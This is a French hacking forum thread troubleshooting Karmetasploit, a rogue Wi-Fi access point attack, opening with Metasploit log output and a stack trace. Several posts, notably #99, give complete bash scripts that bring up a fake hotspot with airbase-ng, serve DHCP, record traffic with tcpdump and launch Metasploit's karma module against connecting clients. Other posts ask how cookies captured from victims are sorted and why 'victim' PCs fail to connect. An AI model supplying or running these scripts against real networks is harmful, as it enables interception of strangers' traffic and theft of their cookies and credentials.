[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)                                                                                                                             
[*] DNS 10.0.0.1:5353 XID 0 (IN::PTR _smb._tcp.local, IN::PTR _pgpkey-hkp._tcp.local, IN::PTR _ftp._tcp.local, IN::PTR _webdav._tcp.local, IN::PTR _webdavs._tcp.local, IN::PTR _sftp-ssh._tcp.local)   



-] fakedns: Resolv::DNS::DecodeError non-backward name pointer /usr/lib/ruby/1.8/resolv.rb:1427:in `get_labels'/usr/lib/ruby/1.8/resolv.rb:1431:in `get_labels'/usr/lib/ruby/1.8/resolv.rb:1413:in `get_name'/usr/lib/ruby/1.8/resolv.rb:1663:in `decode_rdata'/usr/lib/ruby/1.8/resolv.rb:1455:in `get_rr'/usr/lib/ruby/1.8/resolv.rb:1360:in `get_length16'/usr/lib/ruby/1.8/resolv.rb:1455:in `get_rr'/usr/lib/ruby/1.8/resolv.rb:1337:in `decode'/usr/lib/ruby/1.8/resolv.rb:1336:in `each'/usr/lib/ruby/1.8/resolv.rb:1336:in `decode'/usr/lib/ruby/1.8/resolv.rb:1353:in `initialize'/usr/lib/ruby/1.8/resolv.rb:1317:in `new'/usr/lib/ruby/1.8/resolv.rb:1317:in `decode'(eval):101:in `run'(eval):92:in `initialize'(eval):92:in `new'(eval):92:in `run'/pentest/exploits/framework3/lib/msf/base/simple/auxiliary.rb:91:in `job_run_proc'/pentest/exploits/framework3/lib/msf/base/simple/auxiliary.rb:67:in `run_simple'/pentest/exploits/framework3/lib/rex/job_container.rb:34:in `call'/pentest/exploits/framework3/lib/rex/job_container.rb:34:in `start'/pentest/exploits/framework3/lib/rex/job_container.rb:29:in `initialize'/pentest/exploits/framework3/lib/rex/job_container.rb:29:in `new'/pentest/exploits/framework3/lib/rex/job_container.rb:29:in `start'/pentest/exploits/framework3/lib/rex/job_container.rb:141:in `start_bg_job'/pentest/exploits/framework3/lib/msf/base/simple/auxiliary.rb:64:in `run_simple'/pentest/exploits/framework3/lib/msf/base/simple/auxiliary.rb:80:in `run_simple'/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/auxiliary.rb:132:in `cmd_run'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'/pentest/exploits/framework3/lib/msf/ui/console/driver.rb:185:in `load_resource'/pentest/exploits/framework3/lib/msf/ui/console/driver.rb:180:in `each_line'/pentest/exploits/framework3/lib/msf/ui/console/driver.rb:180:in `load_resource'/pentest/exploits/framework3/lib/msf/ui/console/driver.rb:97:in `initialize'/pentest/exploits/framework3/msfconsole:78:in `new'/pentest/exploits/framework3/msfconsole:78
   

VOICI LE SCRIPT ================================>


#!/bin/bash

killall -9 dhcpd tcpdump airbase-ng

airmon-ng start wlan0
modprobe tun

airbase-ng -P -C 30 -c 2 -e "Test" -v wlan0 >/dev/null 2>&1 &
sleep 2
#!/bin/bash
# The script must run after RogueAP.sh in another terminal
ifconfig mon0 up 10.0.0.1 netmask 255.255.255.0 # "awaking" interface created by airbase-ng in RogueAP
sleep 2 # wait 2 sec
sudo echo > /var/lib/dhcp3/dhcpd.leases # reset all previous leases
sudo /etc/init.d/dhcp3-server restart
sleep 2 # wait 2 sec
ifconfig mon0 mtu 1800 # set maximum transfer unit of at0
tcpdump -ni monO -s 0 -w karma_dump.cap >/dev/null 2>&1 & /pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc # listen on mon0 and lauch karma exploit module


============================================================


ps :  Je ne vois toujours pas le hotspot sur mon autre pc équipé d'un XP SP2   en wifi 

Merci de me renseigner un peu plus smile

Dernière modification par mikael8313 (26-12-2009 11:39:23)

Hors Ligne

#89 26-12-2009 14:27:32

mikael8313
Membre
Inscription : 11-08-2009
Messages : 19

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

J'ai reussi a créer le HOTSPOT mais maintenant j'ai un probleme au niveaux de la couche DHCP    mon pc  n'a pas d'adresse ip     j'ai une connexion limité ou inexistante    D'ou sa peut venir? smile


Merci smile

Hors Ligne

#90 01-02-2010 19:10:00

delbosquet
Nouveau membre
Inscription : 31-01-2010
Messages : 8

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

bonjour

quelqu'un pourrai t' il faire un petit résumer sur le fonctionnement de tout sa ou un tuto

merci d'avance

Hors Ligne

#91 09-02-2010 23:49:52

uchronie
Membre
Inscription : 25-08-2009
Messages : 20

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

hello tout le monde, cette exploit est monstrueux!!!

j'ai une petite question!!! y a t'il un backtrack modifié (3 ou 4) contenant les ingredients necessaire pour l'utilisation du script? (framework 3, mise a jour aircrack-ng integré)? merci pour la reponse

ps: c'est plus constructif de fair les mises a jour soi meme je le consoit (plutot que d'avoir tout sur un plateau), mais je pose la question car les versions de backtrack modifiés sont vraiment plus pratique

cordialement

Dernière modification par uchronie (10-02-2010 04:58:52)

Hors Ligne

#92 19-02-2010 15:21:56

JimmyLeeCurtis
N00b
Inscription : 19-02-2010
Messages : 1

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Salut à tous,

Depuis 2 jours (euh... plutôt 2 nuits blanche tongue) je tente de mettre en pratique ce qu'il y avait en première page, et j'obtiens depuis ma machine XP plusieurs réseaux sans fils qui n'ont pas le nom que j'ai spécifié dans le script, mais des caractères non reconnus:
(ex: ###### (wpa2) ou encore ################# (wpa2) etc.... )

Les "dièses" que j'ai mis sont en fait des "carrés" !
Ce qui est plus étrange encore, c'est que c'est toujours du wpa2 et il y a toujours plusieurs réseaux ??!!...

Pour info: ma carte est une ALFA 500mW, (wlan0) mais je suis obligé de descendre le MTU à 1500 (sinon il râle :-)... ça pourrait venir de là??

Je bloque dés le début! j'aimerai au moins faire apparaitre mon premier soft AP!

Merci de votre aide.

Hors Ligne

#93 03-03-2010 11:30:21

fox67
Membre Actif
Inscription : 25-10-2009
Messages : 29

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Une petite question me trotte dans la tête depuis de début de cette discussion (que je trouve fort intéressante, d'ailleurs). Je me demandais comment ça se passe si plusieurs personnes se connectent à l'AP. Le script récupère les cookies, mais comment est-ce qu'il fait la différence entre les différentes personnes? Il crée un fichier différent pour chaque personne connectée en fonction de l'IP?

Hors Ligne

#94 25-04-2010 21:43:10

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

la procedure sous backtrack 4 est la même?


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#95 25-04-2010 21:54:12

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

tien algerino je vien de faire un pdf je le up dans la section tuton par ici

Dernière modification par goliate (25-04-2010 22:00:23)


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#96 20-05-2010 15:35:38

Gregos90300
N00b
Inscription : 20-05-2010
Messages : 3

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bonjour,

Cela fait deux jours que je suis sur ce sujet pour un projet,

J'ai tout bien installer comme vous dites, mais au moment de compiler le script de création d'AP, il me met une erreur provenant de la ligne : dhcpd -cf /pentest/exploits/framework3/dhcpd.conf at0
en me disant que dhcpd : command not found

Mise à part cela, le script continue a s'éxécuter et mestasploit se lance, et depuis un autre pc je repère bien le FAKE_AP mais quand je cherche à me connecter dessus, cela me met connectivité limité ou inexistante.

A quoi c'est du?

Merci par avance pour votre aide.

J'ai vraiment besoin de vous.

Hors Ligne

#97 20-05-2010 21:40:40

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Salut Gregos90300, bienvenue sur le forum smile

Ton erreur est claire : la commande "dhcpd" n'est pas reconnue. Le serveur DHCP (qui correspond à cette commande) est la partie qui attribue une adresse IP aux stations qui se connectent à ton AP. Et une station qui n'a pas d'adresse IP se retrouve... en connectivité limitée ou inexistante, tout s'explique wink

Tu tournes sous quel système ? BackTrack 4 ? Parce que je pense que Karmetasploit a été conçu pour BT3, et il y a quelques différences entre les 2 versions. Je viens de vérifier, le serveur dhcp sous BT4 s'appelle "dhcpd3" et pas "dhcpd" tout court. Il te suffit de modifier le script pour ajouter le "3" et ca devrait aller tout seul smile

Evidemment, si tu es sous Ubuntu (ou autre distribution Linux) il faut d'abord que tu installes le serveur dhcp en question, je te renvoie à la documentation de ta distro wink

Hors Ligne

#98 21-05-2010 10:15:37

Gregos90300
N00b
Inscription : 20-05-2010
Messages : 3

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bonjour tout d'abord et merci pour ta réponse,

J'utilise Backtrack4, j'ai donc modifié en dhcpd3 et effectivement ca ne me met plus l'erreur, mais lorsque je cherche à connecter mon pc victime au réseau ca ne fonctionne pas quand meme...


d'ou cela peux venir?


Merci

Hors Ligne

#99 29-05-2010 04:12:04

3nd3r
N00b
Inscription : 29-05-2010
Messages : 1

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

voilà ce que j'ai fais pour BT4 final que j'utilise a partir d 'une clef usb. J'ai utilisé les posts précédents et les ai mis à ma sauce, a vous d'adapter si besoin (juste wlan0 et mon0 j'imagine)

a faire avant tout dans un shell

msfupdate
cd /pentest/exploits/framework3/
wget http://metasploit.com/users/hdm/tools/karma.rc[/c]

puis à mettre dans un script
[c]#!/bin/bash
#tuer le fichier génant
kill `cat /var/run/dhcpd.pid`

#creer le fichier dhcpd.conf

echo "option domain-name-servers 10.0.0.1;" > dhcpd.conf
echo "" >> dhcpd.conf
echo "default-lease-time 60;" >> dhcpd.conf
echo "max-lease-time 72;" >> dhcpd.conf
echo "" >> dhcpd.conf
echo "ddns-update-style none;" >> dhcpd.conf
echo "" >> dhcpd.conf
echo "authoritative;" >> dhcpd.conf
echo "" >> dhcpd.conf
echo "log-facility local7;" >> dhcpd.conf
echo "" >> dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
echo "option routers 10.0.0.1;" >> dhcpd.conf
echo "option domain-name-servers 10.0.0.1;" >> dhcpd.conf
echo "}" >> dhcpd.conf
clear

airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop mon2

airmon-ng start wlan0
modprobe tun

airbase-ng -P -C 30 -c 10 -e testwifi -v mon0 >/dev/null 2>&1 &
sleep 2

# The script must run after RogueAP.sh in another terminal
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 # "awaking" interface created by airbase-ng in RogueAP
sleep 2 # wait 2 sec
echo > /var/lib/dhcp3/dhcpd.leases # reset all previous leases
/etc/init.d/dhcp3-server restart 
sleep 2 # wait 2 sec
dhcpd3 -pf /var/run/dhcp3-server/dhcpd.pid -cf ~/dhcpd.conf at0 # launch dhcpd using our dhcpd.conf
sleep 2 # wait 2 sec
ifconfig at0 mtu 1800 # set maximum transfer unit of at0
tcpdump -ni at0 -s 0 -w karma_dump.cap >/dev/null 2>&1 & /pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc # listen on at0 and lauch karma exploit module

ça se lance bien, je ne peux tester qu'avec mon ipod étant a l'étrangé. ça se connecte à la station...ensuite... je ne sais pas je continue de me documentersur metasploit. Mis déjà ça m'inique des failles dans l'ipod a priori...

Hors Ligne

#100 07-06-2010 11:00:00

alf95
Nouveau membre
Inscription : 03-06-2010
Messages : 7

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bonjour,

JE suis sur BT4 mais Je ne peux pas éditer le fichier dhcpd.conf, ça ressemble à un un problème de droit mais même en root ça ne veux pas, quelqu'un à une idée ? Merci

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.041 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]